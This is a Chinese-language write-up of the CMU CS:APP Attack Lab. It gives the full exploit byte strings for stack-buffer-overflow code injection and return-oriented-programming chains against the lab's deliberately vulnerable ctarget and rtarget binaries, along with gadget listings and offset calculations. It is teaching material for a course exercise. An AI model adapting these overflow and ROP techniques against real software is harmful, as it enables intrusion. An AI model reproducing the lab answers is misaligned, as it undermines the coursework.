详细的题目要求和资源可以到 http://csapp.cs.cmu.edu/3e/labs.html 或者 http://www.cs.cmu.edu/~./213/schedule.html 获取。
getbuf()
实现为:
unsigned getbuf()
{
char buf[BUFFER_SIZE];
Gets(buf); /* 没有边界检查 */
return 1;
}
其中的BUFFER_SIZE是在编译时候就确定的常量。
Part I: Code Injection Attacks
test()
为执行ctarget会进入并要利用的函数:
void test()
{
int val;
val = getbuf();
printf("No exploit.Getbuf returned 0x%x\n", val);
}
Level 1
这一题需要我们将test()
调用get()
后的返回地址覆盖为touch1()
的地址。
在GDB下设置test()
处的断点,并单步调试进入getbuf()
可以看到,Gets()
读取超过28字节就会将原rsp中的返回地址淹没。查看touch1()
的地址(可以反汇编ctarget或者在调试器里查看):
00000000004017c0 :
4017c0: 48 83 ec 08 sub $0x8,%rsp
4017c4: c7 05 0e 2d 20 00 01 movl $0x1,0x202d0e(%rip) # 6044dc
4017cb: 00 00 00
4017ce: bf c5 30 40 00 mov $0x4030c5,%edi
4017d3: e8 e8 f4 ff ff callq 400cc0
4017d8: bf 01 00 00 00 mov $0x1,%edi
4017dd: e8 ab 04 00 00 callq 401c8d
4017e2: bf 00 00 00 00 mov $0x0,%edi
4017e7: e8 54 f6 ff ff callq 400e40
所以我们可以输入0x28字节填充物+返回地址00000000004017c0,即exploit.txt应该为:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 17 40 00 00 00 00 00
运行:
Level 2
这一题要求我们将test()
调用get()
后的返回到touch2()
,并且传入touch2()
的参数为cookie.txt里的值,在我的环境下,cookie为0x59b997fa
。
void touch2(unsigned val)
{
vlevel = 2; /* Part of validation protocol */
if (val == cookie) {
printf("Touch2!: You called touch2(0x%.8x)\n", val);
validate(2);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
fail(2);
}
exit(0);
}
由上一题知,Gets()
读取超过0x28字节就会将原rsp中的返回地址淹没。但是我们要使得传入touch2()
的参数为cookie,也就是要修改%rdi的值,由题目要求知,ctarget程序并未开启随机地址和栈帧代码不可执行的保护。所以我们可以通过注入代码实现目标。
1.找到touch2()
的地址:
00000000004017ec :
4017ec: 48 83 ec 08 sub $0x8,%rsp
4017f0: 89 fa mov %edi,%edx
4017f2: c7 05 e0 2c 20 00 02 movl $0x2,0x202ce0(%rip) # 6044dc
4017f9: 00 00 00
4017fc: 3b 3d e2 2c 20 00 cmp 0x202ce2(%rip),%edi # 6044e4
401802: 75 20 jne 401824
.........
2.由地址写出相应的汇编代码
movq $0x59b997fa, %rdi #参数
retq
3.编译写好的汇编代码
gcc -c asm.s
4.反汇编刚刚生成的目标文件,得到指令对应的机器码
frank@under:~/Desktop/cs:app/lab/AttackLab/target1$ objdump -d asm.o
asm.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
7: c3 retq
5.我打算就利用buf[BUFFER_SIZE]所在的0x28字节栈帧注入代码。首先要获得栈顶的地址,以便将Gets()
返回到这里(把%rip的指向从.text改为栈帧),在GDB中查看:
所以应该将Gets()
的返回地址淹没为0x5561dc78
。
6.所以exploit.txt应该为(注意小端顺序,且0x28+0x8字节后应该为touch2()
的地址,是我们将%rdi修改后ret指令取到的地址),此时指令和数据都放在栈帧中:
48 c7 c7 fa 97 b9 59 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55 00 00 00 00 ec 17 40 00 00 00 00 00
运行:
Level 3
这一题也是代码注入,但是要求我们向touch3()
传入cookie字符串。
/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
{
char cbuf[110];
/* Make position of check string unpredictable */
char *s = cbuf + random() % 100;
sprintf(s, "%.8x", val);
return strncmp(sval, s, 9) == 0;
}
void touch3(char *sval)
{
vlevel = 3; /* Part of validation protocol */
if (hexmatch(cookie, sval)) {
printf("Touch3!: You called touch3(\"%s\")\n", sval);
validate(3);
} else {
printf("Misfire: You called touch3(\"%s\")\n", sval);
fail(3);
}
exit(0);
}
1.字符串是顺序存储的,查ascii码表可知我的cookie 0x59b997fa
为:(不要掉了0x00)
35 39 62 39 39 37 66 61 00
2.找到touch3()
的地址:
00000000004018fa :
4018fa: 53 push %rbx
4018fb: 48 89 fb mov %rdi,%rbx
4018fe: c7 05 d4 2b 20 00 03 movl $0x3,0x202bd4(%rip) # 6044dc
401905: 00 00 00
401908: 48 89 fe mov %rdi,%rsi
40190b: 8b 3d d3 2b 20 00 mov 0x202bd3(%rip),%edi # 6044e4
401911: e8 36 ff ff ff callq 40184c
401916: 85 c0 test %eax,%eax
401918: 74 23 je 40193d
.........
3.编写汇编语句
movq $0x5561dcb0, %rdi #参数
retq
4.编译反汇编
frank@under:~/Documents/study/cs:app/lab/AttackLab/target1$ objdump -d asm.o
asm.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 b0 dc 61 55 mov $0x5561dcb0,%rdi
7: c3 retq
5.要注意到hexmatch()
和touch3()
之间都有数据结构,特别是hexmatch()
有一个数组,肯定会保存在栈帧中,也就是说%rsp低地址的部分,所以我们要把1中的字符串保存在%rsp的高地址,由Level 2知,这个地址为0x5561dc78+0x28+0x8+0x8 = 0x5561dcb0。所以exploit.txt应该为:
48 c7 c7 b0 dc 61 55 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55 00 00 00 00 fa 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00
运行:
Part II: Return-Oriented Programming
最后两个题开起了随机地址和栈帧代码不可执行的保护,需要使用ROP攻击。
反汇编rtarget得到可以复用代码的部分(gadget farm):
0000000000401994 :
401994: b8 01 00 00 00 mov $0x1,%eax
401999: c3 retq
000000000040199a :
40199a: b8 fb 78 90 90 mov $0x909078fb,%eax
40199f: c3 retq
00000000004019a0 :
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
00000000004019a7 :
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019ae :
4019ae: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
4019b4: c3 retq
00000000004019b5 :
4019b5: c7 07 54 c2 58 92 movl $0x9258c254,(%rdi)
4019bb: c3 retq
00000000004019bc :
4019bc: c7 07 63 48 8d c7 movl $0xc78d4863,(%rdi)
4019c2: c3 retq
00000000004019c3 :
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
00000000004019ca :
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
00000000004019d0 :
4019d0: b8 01 00 00 00 mov $0x1,%eax
4019d5: c3 retq
00000000004019d6 :
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 retq
00000000004019db :
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 retq
00000000004019e1 :
4019e1: c7 07 99 d1 90 90 movl $0x9090d199,(%rdi)
4019e7: c3 retq
00000000004019e8 :
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 retq
00000000004019ef :
4019ef: 8d 87 8d d1 20 db lea -0x24df2e73(%rdi),%eax
4019f5: c3 retq
00000000004019f6 :
4019f6: b8 89 d1 48 c0 mov $0xc048d189,%eax
4019fb: c3 retq
00000000004019fc :
4019fc: c7 07 81 d1 84 c0 movl $0xc084d181,(%rdi)
401a02: c3 retq
0000000000401a03 :
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 retq
0000000000401a0a :
401a0a: c7 07 88 c2 08 c9 movl $0xc908c288,(%rdi)
401a10: c3 retq
0000000000401a11 :
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 retq
0000000000401a18 :
401a18: b8 48 89 e0 c1 mov $0xc1e08948,%eax
401a1d: c3 retq
0000000000401a1e :
401a1e: 8d 87 89 c2 00 c9 lea -0x36ff3d77(%rdi),%eax
401a24: c3 retq
0000000000401a25 :
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 retq
0000000000401a2c :
401a2c: c7 07 81 ce 08 db movl $0xdb08ce81,(%rdi)
401a32: c3 retq
0000000000401a33 :
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 retq
0000000000401a39 :
401a39: 8d 87 c8 89 e0 c3 lea -0x3c1f7638(%rdi),%eax
401a3f: c3 retq
0000000000401a40 :
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 retq
0000000000401a47 :
401a47: 8d 87 48 89 e0 c7 lea -0x381f76b8(%rdi),%eax
401a4d: c3 retq
0000000000401a4e :
401a4e: b8 99 d1 08 d2 mov $0xd208d199,%eax
401a53: c3 retq
0000000000401a54 :
401a54: b8 89 c2 c4 c9 mov $0xc9c4c289,%eax
401a59: c3 retq
0000000000401a5a :
401a5a: c7 07 48 89 e0 91 movl $0x91e08948,(%rdi)
401a60: c3 retq
0000000000401a61 :
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 retq
0000000000401a68 :
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 retq
0000000000401a6e :
401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)
401a74: c3 retq
0000000000401a75 :
401a75: c7 07 81 c2 38 d2 movl $0xd238c281,(%rdi)
401a7b: c3 retq
0000000000401a7c :
401a7c: c7 07 09 ce 08 c9 movl $0xc908ce09,(%rdi)
401a82: c3 retq
0000000000401a83 :
401a83: 8d 87 08 89 e0 90 lea -0x6f1f76f8(%rdi),%eax
401a89: c3 retq
0000000000401a8a :
401a8a: 8d 87 89 c2 c7 3c lea 0x3cc7c289(%rdi),%eax
401a90: c3 retq
0000000000401a91 :
401a91: b8 88 ce 20 c0 mov $0xc020ce88,%eax
401a96: c3 retq
0000000000401a97 :
401a97: c7 07 48 89 e0 c2 movl $0xc2e08948,(%rdi)
401a9d: c3 retq
0000000000401a9e :
401a9e: 8d 87 89 c2 60 d2 lea -0x2d9f3d77(%rdi),%eax
401aa4: c3 retq
0000000000401aa5 :
401aa5: b8 8d ce 20 d2 mov $0xd220ce8d,%eax
401aaa: c3 retq
0000000000401aab :
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 retq
0000000000401ab2 :
401ab2: b8 01 00 00 00 mov $0x1,%eax
401ab7: c3 retq
401ab8: 90 nop
401ab9: 90 nop
401aba: 90 nop
401abb: 90 nop
401abc: 90 nop
401abd: 90 nop
401abe: 90 nop
401abf: 90 nop
指令编码参考如下,以十六进制表示:**
A. Encodings of movq instructions
B. Encodings of popq instructions
C. Encodings of movl instructions
D. Encodings of 2-byte functional nop instructions
Level 2
这一题要求我们重复第二题的套路,并且只能使用%rax–%rdi前8个x86-64寄存器和以下指令:
movq : The codes for these are shown in Figure A.
popq : The codes for these are shown in Figure B.
ret : This instruction is encoded by the single byte 0xc3.
nop : This instruction (pronounced “no op,” which is short for “no operation”) is encoded by the single
byte 0x90. Its only effect is to cause the program counter to be incremented by 1.
1.寻找可用指令,我一开始的想法是直接找pop %rdi 然后返回到touch2()
,但是并没有在gadget farm中找到对应的5f机器码。于是我想先pop到其他寄存器然后用movq指令,由于看到%rax参与的比较多,找pop %rax和movq %rax, %rdi。
找到如下两个可以利用的gadgets:
00000000004019a7 :
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019c3 :
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
addval_219
要利用的58的地址:0x4019a7 + 4= 0x4019ab
setval_426
要利用的地址:0x4019c3 + 2 = 0x4019c5
所以我们的gadgets就是0x4019ab
和0x4019c5
2.寻找touch2()
的地址:(函数在.text段内,不受栈帧地址随机化的影响)
00000000004017ec :
4017ec: 48 83 ec 08 sub $0x8,%rsp
4017f0: 89 fa mov %edi,%edx
4017f2: c7 05 e0 3c 20 00 02 movl $0x2,0x203ce0(%rip) # 6054dc
4017f9: 00 00 00
4017fc: 3b 3d e2 3c 20 00 cmp 0x203ce2(%rip),%edi # 6054e4
401802: 75 20 jne 401824
401804: be 08 32 40 00 mov $0x403208,%esi
401809: bf 01 00 00 00 mov $0x1,%edi
40180e: b8 00 00 00 00 mov $0x0,%eax
................
3.查看栈帧大小
可以看到栈帧大小没有改变,还是0x28个字节。
4.所以我们可以输入0x28字节填充物+第一个gadget地址0x4019ab
+ cookie0x59b997fa
(pop到%rax中) + 第二个gadget地址0x4019c5
+ touch2()
的地址,即exploit.txt应该为:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 19 40 00 00 00 00 00 fa 97 b9 59 00 00 00 00 c5 19 40 00 00 00 00 00 ec 17 40 00 00 00 00 00
运行:
Level 3
这一题可能要费很多时间,以后再写。。先去复习数理逻辑。。
更新:
这一题费了大概1个小时。主要是题目中给的一个建议:You’ll want to review the effect a movl instruction has on the upper 4 bytes of a register, as is described on page 183 of the text.
一直没有明白只用movq+movl+popq+functional nop能获取字符串的首地址到%rdi中。因为如果只靠“最后一次”gadget将此时字符串的地址(字符串保存在最后一个gadget的高地址部分),那么不存在能把%rsp直接送到%rdi的指令,并且无法调用touch3()
(此时最后一个gadget和字符串紧密相连)。所以这个思路不行,只能采取相对地址的思想:先取出%esp(此时还不是字符串的首地址),获取高位的不变地址,然后让它加上偏移值,即可得到我们设置的字符串的首地址。
但是还有一个问题,题目没有给addq的参考机器码。也就是说,我们只能够用movl指令去改变低位的值,但是这样又会让高位(例如7fff..)丢失。
这里卡了一会,突然想到gadgets中会不会有可以利用的gadget。查找后找到一个“鹤立鸡群”的:
00000000004019d6 :
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 retq
所以采取这样一个方案:%rdi和%rsi中各保存旧地址和偏移量。调用这个gadget后%rax中就是字符串真正的地址了。然后把%rax直接或间接的送给%rdi,然后返回到touch3()
。下面是这个方案的实现步骤:
1.%rsp肯定是要取出来的,我们先在gadgets中寻找movq %rsp, 的指令:
虽然没有找到直接movq %rsp, %rdi的指令,但是找到了一个送到%rax的
movq %rsp, %rax #机器码:48 89 e0
0000000000401aab : #利用地址401aad
401aab: c7 07 48 89 e0 90 movl $0x90e08948,(%rdi)
401ab1: c3 retq
2.然后再找movq %rax, %rsi的指令,和上面的movq %rsp, %rax结合间接传送旧地址:
找到两个可以利用的:
movq %rax, %rdi #机器码48 89 c7
00000000004019a0 : #利用地址4019a2
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
00000000004019c3 :
4019c3: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
4019c9: c3 retq
3.找直接能把offset弹到%rsi的popq指令,然而并没有。。于是找传送到%rsi的指令,想做一次间接传送,然而也没有。。。突然想到由于我们只需要低位offset(字符串在高地址保存),movl , %esi也是行的。
于是找到了四个都是movl %ecx, %esi的可利用指令:(注意一些functional nop的存在不影响gadget的功能)
movl %ecx, %esi #机器码89 ce
00000000004019e8 :
4019e8: 8d 87 89 ce 78 c9 lea -0x36873177(%rdi),%eax
4019ee: c3 retq
0000000000401a11 : #可利用地址401a13
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3 retq
0000000000401a25 :
401a25: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
401a2b: c3 retq
0000000000401a61 :
401a61: 8d 87 89 ce 92 c3 lea -0x3c6d3177(%rdi),%eax
401a67: c3 retq
4.接着我们就找有么有popq %rcx的gadget,然而并没有,说明还要做一次间接传送。寻找movl ,%ecx(后面也是,如果间接传送直接找movl,比movq机器码简单,更可能存在)
找到如下两个可以用的gadget,都是movl %edx, %ecx:
movl %edx, %ecx #机器码89 d1
0000000000401a33 : #可利用地址401a34
401a33: b8 89 d1 38 c9 mov $0xc938d189,%eax
401a38: c3 retq
0000000000401a68 :
401a68: b8 89 d1 08 db mov $0xdb08d189,%eax
401a6d: c3 retq
5.接着寻找有没有popq %rdx的gadget,然而还是没有!!哎,看来还要做间接传送。寻找movl , %edx指令:
找到如下两个可以用的gadget,都是movl %eax, %edx
movl %eax, %edx #机器码89 c2
00000000004019db : #可利用地址4019dd
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 retq
0000000000401a40 :
401a40: 8d 87 89 c2 84 c0 lea -0x3f7b3d77(%rdi),%eax
401a46: c3 retq
6.接着找popq %rax的gadget,这次终于找到了。。(哭)
popq %rax #机器码58
00000000004019a7 : #可利用地址4019ab
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
00000000004019ca :
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
7.寻找touch3()
的地址:00000000004018fa
00000000004018fa :
4018fa: 53 push %rbx
4018fb: 48 89 fb mov %rdi,%rbx
4018fe: c7 05 d4 3b 20 00 03 movl $0x3,0x203bd4(%rip) # 6054dc
401905: 00 00 00
401908: 48 89 fe mov %rdi,%rsi
40190b: 8b 3d d3 3b 20 00 mov 0x203bd3(%rip),%edi # 6054e4
401911: e8 36 ff ff ff callq 40184c
401916: 85 c0 test %eax,%eax
401918: 74 23 je 40193d
40191a: 48 89 da mov %rbx,%rdx
40191d: be 58 32 40 00 mov $0x403258,%esi
...............
先梳理一下我们的输入策略:
0x28字节填充物 -> movq %rsp, %rax(旧地址)-> movq %rax, %rdi -> popq %rax(偏移量) -> offset(上一个gadget pop的时候就是pop这个数据到%rax中)-> movl %eax, %edx -> movl %edx, %ecx -> movl %ecx, %esi -> lea (%rdi,%rsi,1),%rax -> touch3的地址 -> cookie string
总共用到了8个gadgets,和题目说的“官方”方案的步骤数一样,不知道最短能用几个?
下面先开始构建输入,然后再算offset的值应该是多少:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 /* 0x28 bytes 填充物 */
ad 1a 40 00 00 00 00 00 /* movq %rsp, %rax */
a2 19 40 00 00 00 00 00 /* movq %rax, %rdi */
ab 19 40 00 00 00 00 00 /* popq %rax */
xx xx 00 00 00 00 00 00 /* offset*/
dd 19 40 00 00 00 00 00 /* movl %eax, %edx */
34 1a 40 00 00 00 00 00 /* movl %edx, %ecx */
13 1a 40 00 00 00 00 00 /* movl %ecx, %esi */
d6 19 40 00 00 00 00 00 /* lea (%rdi,%rsi,1),%rax */
a2 19 40 00 00 00 00 00 /* movq %rax, %rdi */
fa 18 40 00 00 00 00 00 /* touch3 */
35 39 62 39 39 37 66 61 00 /* string */
下面开始算offset,注意,retq相当于popq %rip,也就是说,在执行第一个gadget的movq %rsp, %rax的时候,%rsp已经指向下一个gadget movq %rax, %rdi了,一开始我在这犯了错,多加了8个字节。所以偏移量应该是:9*8 = 72 = 0x48 (注意offset本身也占了8个字节)。
所以exploit.txt应该如下:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 1a 40 00 00 00 00 00 a2 19 40 00 00 00 00 00 ab 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 dd 19 40 00 00 00 00 00 34 1a 40 00 00 00 00 00 13 1a 40 00 00 00 00 00 d6 19 40 00 00 00 00 00 a2 19 40 00 00 00 00 00 fa 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00
运行:
这次实验真的很有意思,如果说上次的bomblab是逆向的话,这次应该就是pwn吧,哈哈。
另外,functional nop有两个值得一提:
and 和 or指令本来是改变目的地址的数据的,但是这里说的是源和目的地址相同,所以无论怎么算都是“改变后相同“即”不改变“操作数的。